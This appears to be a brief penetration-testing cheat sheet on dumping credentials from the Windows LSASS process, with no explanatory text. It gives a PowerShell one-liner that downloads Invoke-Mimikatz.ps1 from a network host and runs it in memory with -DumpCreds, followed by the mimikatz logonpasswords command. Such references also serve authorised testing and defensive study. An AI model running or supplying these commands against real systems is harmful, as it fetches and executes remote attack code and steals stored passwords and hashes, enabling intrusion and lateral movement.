LSASS

LSASS (Local Security Authority Subsystem Service)

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.0.100/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds
mimikatz # sekurlsa:logonpasswords

Last updated